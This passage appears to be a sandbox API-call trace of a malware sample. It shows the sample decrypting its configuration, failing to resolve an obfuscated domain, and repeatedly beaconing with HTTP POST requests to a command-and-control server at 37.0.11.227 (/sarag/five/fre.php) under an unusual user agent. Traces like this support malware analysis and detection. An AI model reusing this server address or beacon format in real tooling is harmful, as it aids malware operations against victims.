(HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.863] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.864] GetProcessHeap () returned 0x690000 [0191.864] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.864] GetProcessHeap () returned 0x690000 [0191.865] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.865] GetProcessHeap () returned 0x690000 [0191.865] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0191.865] GetProcessHeap () returned 0x690000 [0191.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0191.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.886] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0191.893] GetProcessHeap () returned 0x690000 [0191.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0191.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.894] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.895] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.896] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.896] GetProcessHeap () returned 0x690000 [0191.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0191.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.898] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0191.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.899] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.900] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0191.900] GetProcessHeap () returned 0x690000 [0191.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.901] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0191.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.902] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0191.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.902] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0191.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.905] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0191.905] GetProcessHeap () returned 0x690000 [0191.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.905] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2d08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0191.905] GetProcessHeap () returned 0x690000 [0191.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0191.906] socket (af=2, type=1, protocol=6) returned 0x3a4 [0191.906] connect (s=0x3a4, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0191.933] FreeAddrInfoW (pAddrInfo=0x6b2d08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0191.933] GetProcessHeap () returned 0x690000 [0191.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0191.933] GetProcessHeap () returned 0x690000 [0191.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0191.934] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.935] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.935] GetProcessHeap () returned 0x690000 [0191.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0191.935] GetProcessHeap () returned 0x690000 [0191.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.936] GetProcessHeap () returned 0x690000 [0191.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0191.936] GetProcessHeap () returned 0x690000 [0191.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0191.936] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.937] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.937] GetProcessHeap () returned 0x690000 [0191.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0191.937] GetProcessHeap () returned 0x690000 [0191.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.938] send (s=0x3a4, buf=0x6abd08*, len=242, flags=0) returned 242 [0191.938] send (s=0x3a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0191.939] GetProcessHeap () returned 0x690000 [0191.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0191.939] recv (in: s=0x3a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0192.013] GetProcessHeap () returned 0x690000 [0192.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0192.017] GetProcessHeap () returned 0x690000 [0192.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0192.018] GetProcessHeap () returned 0x690000 [0192.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0192.018] GetProcessHeap () returned 0x690000 [0192.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0192.018] closesocket (s=0x3a4) returned 0 [0192.019] GetProcessHeap () returned 0x690000 [0192.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0192.019] GetProcessHeap () returned 0x690000 [0192.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0192.019] GetProcessHeap () returned 0x690000 [0192.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0192.020] GetProcessHeap () returned 0x690000 [0192.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0192.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2fc) returned 0x3a4 [0192.022] Sleep (dwMilliseconds=0xea60) [0192.024] GetProcessHeap () returned 0x690000 [0192.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0192.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.044] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0192.053] GetProcessHeap () returned 0x690000 [0192.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0192.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.054] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0192.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.055] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.055] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.056] GetProcessHeap () returned 0x690000 [0192.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0192.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.061] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0192.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.065] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0192.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.066] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0192.066] GetProcessHeap () returned 0x690000 [0192.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0192.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.067] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.068] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.071] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.072] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.072] GetProcessHeap () returned 0x690000 [0192.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0192.072] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.072] GetProcessHeap () returned 0x690000 [0192.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0192.073] GetProcessHeap () returned 0x690000 [0192.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0192.073] GetProcessHeap () returned 0x690000 [0192.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0192.073] GetProcessHeap () returned 0x690000 [0192.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0192.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.074] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0192.089] GetProcessHeap () returned 0x690000 [0192.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0192.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.090] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0192.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.093] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.095] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.095] GetProcessHeap () returned 0x690000 [0192.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0192.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.096] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0192.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.097] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0192.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.098] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0192.098] GetProcessHeap () returned 0x690000 [0192.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0192.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.100] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0192.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.101] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0192.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.103] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0192.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0192.105] GetProcessHeap () returned 0x690000 [0192.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0192.105] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2ba0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0192.105] GetProcessHeap () returned 0x690000 [0192.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0192.105] socket (af=2, type=1, protocol=6) returned 0x3a8 [0192.106] connect (s=0x3a8, name=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0192.137] FreeAddrInfoW (pAddrInfo=0x6b2ba0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0192.137] GetProcessHeap () returned 0x690000 [0192.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0192.137] GetProcessHeap () returned 0x690000 [0192.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0192.138] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0192.139] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.139] GetProcessHeap () returned 0x690000 [0192.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0192.139] GetProcessHeap () returned 0x690000 [0192.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0192.140] GetProcessHeap () returned 0x690000 [0192.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0192.140] GetProcessHeap () returned 0x690000 [0192.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0192.141] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0192.142] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.142] GetProcessHeap () returned 0x690000 [0192.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0192.142] GetProcessHeap () returned 0x690000 [0192.142] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0192.143] send (s=0x3a8, buf=0x6abd08*, len=242, flags=0) returned 242 [0192.143] send (s=0x3a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0192.143] GetProcessHeap () returned 0x690000 [0192.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0192.143] recv (in: s=0x3a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0192.216] GetProcessHeap () returned 0x690000 [0192.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0192.217] GetProcessHeap () returned 0x690000 [0192.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0192.218] GetProcessHeap () returned 0x690000 [0192.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0192.219] GetProcessHeap () returned 0x690000 [0192.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0192.219] closesocket (s=0x3a8) returned 0 [0192.220] GetProcessHeap () returned 0x690000 [0192.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0192.220] GetProcessHeap () returned 0x690000 [0192.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0192.221] GetProcessHeap () returned 0x690000 [0192.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0192.221] GetProcessHeap () returned 0x690000 [0192.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0192.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x110c) returned 0x3a8 [0192.225] Sleep (dwMilliseconds=0xea60) [0192.227] GetProcessHeap () returned 0x690000 [0192.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0192.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0192.241] GetProcessHeap () returned 0x690000 [0192.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0192.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.242] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0192.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.243] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.246] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.246] GetProcessHeap () returned 0x690000 [0192.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0192.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.247] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0192.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.249] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0192.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.249] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0192.249] GetProcessHeap () returned 0x690000 [0192.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0192.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.250] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.252] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.252] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.258] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.258] GetProcessHeap () returned 0x690000 [0192.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0192.258] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.259] GetProcessHeap () returned 0x690000 [0192.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0192.259] GetProcessHeap () returned 0x690000 [0192.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0192.259] GetProcessHeap () returned 0x690000 [0192.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0192.260] GetProcessHeap () returned 0x690000 [0192.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0192.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0192.261] CryptAcquireContextW (in: 